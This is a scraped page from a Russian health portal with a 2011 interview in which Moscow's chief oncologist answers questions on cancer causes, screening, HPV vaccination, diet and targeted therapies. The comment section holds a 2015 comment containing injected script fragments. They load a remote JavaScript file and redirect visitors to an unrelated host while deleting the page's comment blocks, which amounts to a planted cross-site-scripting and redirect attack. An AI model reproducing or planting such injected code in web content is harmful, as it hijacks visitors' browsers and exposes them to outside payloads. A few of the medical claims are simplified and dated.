Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как защитить себя от рака  >>  Как защитить себя от рака
 
Обратная связь
 

Как защитить себя от рака

Размер шрифта
28 октября 2011 10:05
  • google_analytics: false
  • Нравится

Продолжается месячник по борьбе против рака молочной железы. На вопросы об этой болезни, и не только о РМЖ, отвечает главный онколог Москвы, профессор Анатолий Нахимович Махсон.

Каковы причины развития рака? Наследственность? Слабый иммунитет? Сильный стресс?

Все зависит от типа рака. Рак молочной железы развивается при мутации определенных генов. А рак желудка по наследству не передается и связан с ослаблением защитных сил организма. На фоне стресса рак тоже возможен, если иммунная система ослабла. Возможно, если иммунная система в роду слабая, то рак будет у бабушки и у внучки. Но это не обязательно. Если у вас возникают опасения, обязательно регулярно проходите обследования.

Средний возраст начала развития рака – 55-65 лет. После 45 лет главные специалисты для женщины – маммолог и гинеколог. Для мужчин – гастроэнтеролог, проктолог, пульмонолог.

Существует ли общий тест для определения рака? Анализ крови? Узи? КТ?

Нет. При каждой ситуации врач назначает свои методы обследования: мамография, гастроскопия, рентген легких. Есть отдельные маркеры для раннего выявления, к примеру, наиболее распространенный для мужчин ПСА – простат-специфический антиген. А вот КТ на ранних стадиях не делают. Нельзя же сделать КТ всего тела.

Правда ли, что прививка от рака шейки матки помогает? Не является ли это простым способом заработать денег на страхе людей?

Уже доказано, что на развитие рака шейки матки влияет вирус папилломы человека. Предполагается, что если его не будет, то и риск рака шейки матки снизится. Сложность в том, что прививку надо делать до того, как этот вирус появился в организме, то есть прививать надо девочек еще до начала половой жизни. Насколько прививка была эффективна, выяснится лет через 15-20. Теоретически она, конечно, эффективна.

Поможет ли диета против рака?

Если вы едите здоровую пищу, то ваш иммунитет в порядке. Если в вашей еде нет примесей, модифицированных продуктов, если нет ожирения, значит, иммунитет не испытывает чрезмерных нагрузок и легче справляется с мутированными клетками. Не стоит слепо верить бытующим мифам о пользе тех или иных продуктов. К примеру, рыба – главный продукт на столе у японцев, однако, по заболеванию раком желудка японцы на первом месте в мире.

Какие профилактические меры надо предпринимать каждый день, чтобы уменьшить возможность заболевания?

Все, что укрепляет организм:


  1. Нормальное питание

  2. Физические нагрузки

  3. Желательно избегать стрессов, хотя это, конечно, маловероятно

  4. Женщине надо своевременно родить: беременность, кормление – все это снижает риски заболевания раком молочной железы. Вообще, РМЖ – гормонально-зависимая болезнь, она связана с функцией яичников, поэтому все, что нарушает их работу – частое прерывание беременности, отсутствие родов, отсутствие вскармливания, воспалительные процессы, – повышает риски развития рака.

Если ВПЧ – причина развития рака шейки матки, то можно ли назвать рак вирусным заболеванием?

Вирус принимает участие в образовании, но рак это не заразное заболевание и не передается контактным путем.

Какова на сегодняшний день статистика заболевания раком?

У нас заболеваемость раком ниже, чем в США, однако смертность больше. Связано это с запущенностью болезней – в нашей стране намного больше поздних форм опухоли. Наши соотечественники не особо заботятся о своем здоровье. К примеру, в Москве полно маммографов, но они не особо пользуются спросом, хотя именно РМЖ – лидирует по уровню смертности от онкологических заболеваний среди женщин. Если эту болезнь выявить рано, то в 95% ее можно вылечить. А на 4-й стадии благополучный исход – только в 15-20% случаев.

Какие сегодня существуют новые технологии борьбы с раком?

Сейчас появляются серии новых лекарств. Если раньше была только химиотерапия, то сегодня набирают вес так называемые таргетные препараты, которые действуют направленно, на конкретную мишень в клетке. Они блокируют определенный процесс, который помогает размножаться опухолевой клетке.

Таргетные препараты значительно эффективней и значительно дороже. Например, полный курс герцептина обойдется в 1 200 000 рублей. Есть препараты, которые стоят 100 тысяч, 200 тысяч за месячный курс. А всего надо лечиться 4-5 месяцев. Лечение 3 таргетными препаратами в течение 3-х лет может обойтись в 350 тысяч долларов.

Конечно, бюджетные средства выделяются, но по сравнению со Штатами мы далеко позади: там бюджет здравоохранения – 2 триллиона долларов.

Переходит ли мастопатия в опухоли?

Только узловая. Диффузная – нет. Вообще рак молочной железы, как и любой другой рак, уже не является неизлечимой болезнью. За последние двадцать лет выживаемость выросла в два раза. Все зависит от стадии, на которой обнаружен рак. Ваша здоровье – это ваша работа: чаще обследуйтесь и следите за собой.

Подготовлено по материалам онлайн конференции на сайте «АиФ»

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Раки, которые мы победили   Простые ежедневные прогулки уменьшают риск рака груди   Почему возникает рак   Смертельные цифры  
18 октября 2012Новый тест скажет, будет у вас рак или нет 09 августа 2012Раковые клетки теперь не смогут скрыться!
 
03 июля 2012Созданы лекарства, которые обучают организм убивать рак 15 сентября 2011Рак – болезнь бедных?
 

Слайдшоу

1
Факторы, которые влияют на возникновение рака
Супереда против рака
Продукты против рака

Тесты

1
Что вы знаете о раке груди?
Что вы знаете о раке груди?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.